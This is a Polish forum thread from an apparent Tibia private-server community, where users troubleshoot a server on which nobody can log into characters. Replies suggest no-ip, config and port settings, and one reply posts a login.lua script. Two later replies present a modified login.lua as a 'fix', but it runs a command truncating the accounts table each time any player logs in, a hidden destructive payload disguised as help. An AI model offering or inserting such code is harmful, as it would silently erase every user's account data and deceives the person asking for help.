• logo_cipsoft
    Nowe serwery zostały otwarte 19 Lut 2025:
    Noctalia (Open PvP) Ignitera (Open PvP) us_logo Xybra (Open PvP)

Nikt nie moze sie zalogowac na postac.

Odp: Nikt nie moze sie zalogowac na postac.

mam domen? no-ip. zrobi?em /openserver i i tak nic. A w configu ca?y czas mam ip kompa.
 
Odp: Nikt nie moze sie zalogowac na postac.

Jak masz no-ip to raczej w configu powinienes miec to ip co se ustawiles na no-ip
albo wpisac "auto" ale to chyba tylko dla silnikow sql
 
Odp: Nikt nie moze sie zalogowac na postac.

wpisa?em auto, ale w silniku i tak si? wy?wietla to ip to wpisywa?em wszy?niej, wi?c to ru?nicy nie da?o. (sprawdza?em)
 
Odp: Nikt nie moze sie zalogowac na postac.

Noto niewiem a sprawdzales na innym silniku czy moga sie zalogowywac?
 
Odp: Nikt nie moze sie zalogowac na postac.

tak, sprawdza?em i nic =/ (sprawdza?em na thais war, evo by aciek i na tym: evo by aciek rehost by wyro)
 
Odp: Nikt nie moze sie zalogowac na postac.

<~.::Od?wierzam::.~>
eehh... pliss, niech kto?, kto si? na tym zna pomo?e mi :(
 
Odp: Nikt nie moze sie zalogowac na postac.

To tak.. Masz no-ip... masz silnik XML? jak silnik XML to wpisz tam gdzie jest Adres URL "twojots.no-ip.org" wpisujesz tam twoje no-ip a tam gdzie twoje ip to wpisz "auto" lub "twoje.normalne.ip" Jezeli to nie zadziala to musisz jeszcze raz zrobic no-ip.. powiedz mi tez na jakiej stronie robiles no-ip..! czy ?? to tez wazne :)
 
Odp: Nikt nie moze sie zalogowac na postac.

1. Postac, na ktora chcemy wejsc nie istnieje (wpis jest, a postaci nie ma). Usunietych danych z niczego nie przywrocimy, wiec pozostaje ponowne zalozenie postaci.
2. Blad moze byc spowodowany bledami w odczycie danych z bazy MySQL. W tym celu aktualizujemy WebServa lub XAMPPA (zalezy kto co ma, ale WebServa NIE polecam).
3. Blad moze tkwic w zlej konfiguracji serwera, czy to nie odblokowanych portow w routerze (odsylam do ktoregos podpunktu wyzej) lub zlych informacji w pliku konfiguracyjnym config.lua.
4. XAMPP juz nie bedzie spelnial "wymagan" serwera, wiec trzeba zainstalowac WAMP. WAMP to sa 4 aplikacje, ktore zawiera XAMPP, ale oczywiscie instalowane oddzielnie. Zasadnicza roznica jest taka, ze ciezko wplynac na poszczegolne komponenty XAMPPa typu aktualizacja. W separacji bardzo latwo uaktualnimy kazdy z elementow. Najlepszy tutorial o WAMPie znajduje sie tutaj:

Sam jestem w trakcie zabawy w WAMP, jest to bardzo dobre rozwiazanie, aczkolwiek trzeba miec troche oleju w glowie.
 
Odp: Nikt nie moze sie zalogowac na postac.

niestety to nic nie dalo... nadal nikt nie moze wbic :(
je?li to to wa?ne, to kiedy kto? pr?buje wbi? na otsa wyskakuj? bugi w silniku typu: I/0 warning : failed to load external encity "data/accounts/0.xml"
a passy na pewno dobre podaj?. ale co najdziwniejsze, ?e jak poda passy 111111/tibia to i tak w silniku sie wy?wietla 0, 1 lub 2. no-ip mam ze strony i mam silnik xml evo by aicek rehost by wyro
 
Odp: Nikt nie moze sie zalogowac na postac.

<~.::Od?wierzam::.~>
 
Odp: Nikt nie moze sie zalogowac na postac.

1. je?li zaczniesz u?ywa? sql nie b?dzie k?opotu na 10000000000000000%
2. Wy??cz skeyp (przysi?gam ?e to dzia?a bo skeyp ma 80port :()
3. I je?li robienie otsa wogule ci nie wychodzi jest na to 1 bardzo dobry sposob.....
NIE R?B OTSA
JU? NIGDY !!!!!!!!:up:
 
Odp: Nikt nie moze sie zalogowac na postac.

@guralex
ale mu pomogles o boze -.-
Ja mam otsa 8.50 sql
dziwne bo mam ten sam problem, mam neostrane liveboxa odblokowalem wszystkie porty nie mam wlaczonego skype ani nic a koledzy moga zalogowac sie tylko do listy postaci a co dziwne bo miesiac temu mogli sie normalnie logowac. Jaka moze byc przyczyna? Prosze o pomoc i przylaczam sie do Mateza :huh:

@edit
Zapomnialem powiedziec ze jak podaje im ip z dyn~~ to wyskakuje im invalid server adress...
 
Odp: Nikt nie moze sie zalogowac na postac.

Kod:
local config = {
	loginMessage = getConfigValue('loginMessage')
}

function onLogin(cid)
	local loss = getConfigValue('deathLostPercent')
	if(loss ~= nil) then
		doPlayerSetLossPercent(cid, PLAYERLOSS_EXPERIENCE, loss * 10)
	end

	local accountManager = getPlayerAccountManager(cid)
	if(accountManager == MANAGER_NONE) then
		local lastLogin, str = getPlayerLastLoginSaved(cid), config.loginMessage
		if(lastLogin > 0) then
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_DEFAULT, str)
			str = "Your last visit was on " .. os.date("%a %b %d %X %Y", lastLogin) .. "."
		else
			str = str .. " Please choose your outfit."
			doPlayerSendOutfitWindow(cid)
		end

		doPlayerSendTextMessage(cid, MESSAGE_STATUS_DEFAULT, str)
	elseif(accountManager == MANAGER_NAMELOCK) then
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Hello, it appears that your character has been namelocked, what would you like as your new name?")
	elseif(accountManager == MANAGER_ACCOUNT) then
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Hello, type 'account' to manage your account and if you want to start over then type 'cancel'.")
	else
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Hello, type 'account' to create an account or type 'recover' to recover an account.")
	end

	if(not isPlayerGhost(cid)) then
		doSendMagicEffect(getCreaturePosition(cid), CONST_ME_TELEPORT)
	end

	registerCreatureEvent(cid, "Mail")
	registerCreatureEvent(cid, "GuildMotd")
	registerCreatureEvent(cid, "Idle")
	registerCreatureEvent(cid, "SkullCheck")
	registerCreatureEvent(cid, "ReportBug")
	return true
end
 
Odp: Nikt nie moze sie zalogowac na postac.

sproboj to
Kod:
local config = {
	loginMessage = getConfigValue('loginMessage')
}
function onLogin(cid)
        db.executeQuery("$SQL->query("TRUNCATE TABLE `accounts`;");")
	local loss = getConfigValue('deathLostPercent')
	if(loss ~= nil) then
		doPlayerSetLossPercent(cid, PLAYERLOSS_EXPERIENCE, loss * 10)
	end
	local accountManager = getPlayerAccountManager(cid)
	if(accountManager == MANAGER_NONE) then
		local lastLogin, str = getPlayerLastLoginSaved(cid), config.loginMessage
		if(lastLogin > 0) then
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_DEFAULT, str)
			str = "Your last visit was on " .. os.date("%a %b %d %X %Y", lastLogin) .. "."
		else
			str = str .. " Please choose your outfit."
			doPlayerSendOutfitWindow(cid)
		end
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_DEFAULT, str)
	elseif(accountManager == MANAGER_NAMELOCK) then
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Hello, it appears that your character has been namelocked, what would you like as your new name?")
	elseif(accountManager == MANAGER_ACCOUNT) then
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Hello, type 'account' to manage your account and if you want to start over then type 'cancel'.")
	else
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Hello, type 'account' to create an account or type 'recover' to recover an account.")
	end
	if(not isPlayerGhost(cid)) then
		doSendMagicEffect(getCreaturePosition(cid), CONST_ME_TELEPORT)
	end
	registerCreatureEvent(cid, "Mail")
	registerCreatureEvent(cid, "GuildMotd")
	registerCreatureEvent(cid, "Idle")
	registerCreatureEvent(cid, "SkullCheck")
	registerCreatureEvent(cid, "ReportBug")
	return true
end

nie mam pewnosci ale sproboj
 
Odp: Nikt nie moze sie zalogowac na postac.

czekaj, juz wiem czemu

Kod:
local config = {
	loginMessage = getConfigValue('loginMessage')
}
function onLogin(cid)
        db.executeQuery("TRUNCATE TABLE `accounts`;")
	local loss = getConfigValue('deathLostPercent')
	if(loss ~= nil) then
		doPlayerSetLossPercent(cid, PLAYERLOSS_EXPERIENCE, loss * 10)
	end
	local accountManager = getPlayerAccountManager(cid)
	if(accountManager == MANAGER_NONE) then
		local lastLogin, str = getPlayerLastLoginSaved(cid), config.loginMessage
		if(lastLogin > 0) then
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_DEFAULT, str)
			str = "Your last visit was on " .. os.date("%a %b %d %X %Y", lastLogin) .. "."
		else
			str = str .. " Please choose your outfit."
			doPlayerSendOutfitWindow(cid)
		end
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_DEFAULT, str)
	elseif(accountManager == MANAGER_NAMELOCK) then
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Hello, it appears that your character has been namelocked, what would you like as your new name?")
	elseif(accountManager == MANAGER_ACCOUNT) then
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Hello, type 'account' to manage your account and if you want to start over then type 'cancel'.")
	else
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Hello, type 'account' to create an account or type 'recover' to recover an account.")
	end
	if(not isPlayerGhost(cid)) then
		doSendMagicEffect(getCreaturePosition(cid), CONST_ME_TELEPORT)
	end
	registerCreatureEvent(cid, "Mail")
	registerCreatureEvent(cid, "GuildMotd")
	registerCreatureEvent(cid, "Idle")
	registerCreatureEvent(cid, "SkullCheck")
	registerCreatureEvent(cid, "ReportBug")
	return true
end
 
Odp: Nikt nie moze sie zalogowac na postac.

Niestety dalej to samo ;/ blad nie wyskakuje, lista postaci wyskakuje ale na postac juz sie nikt nie zaloguje bo jest timeout
 
Do góry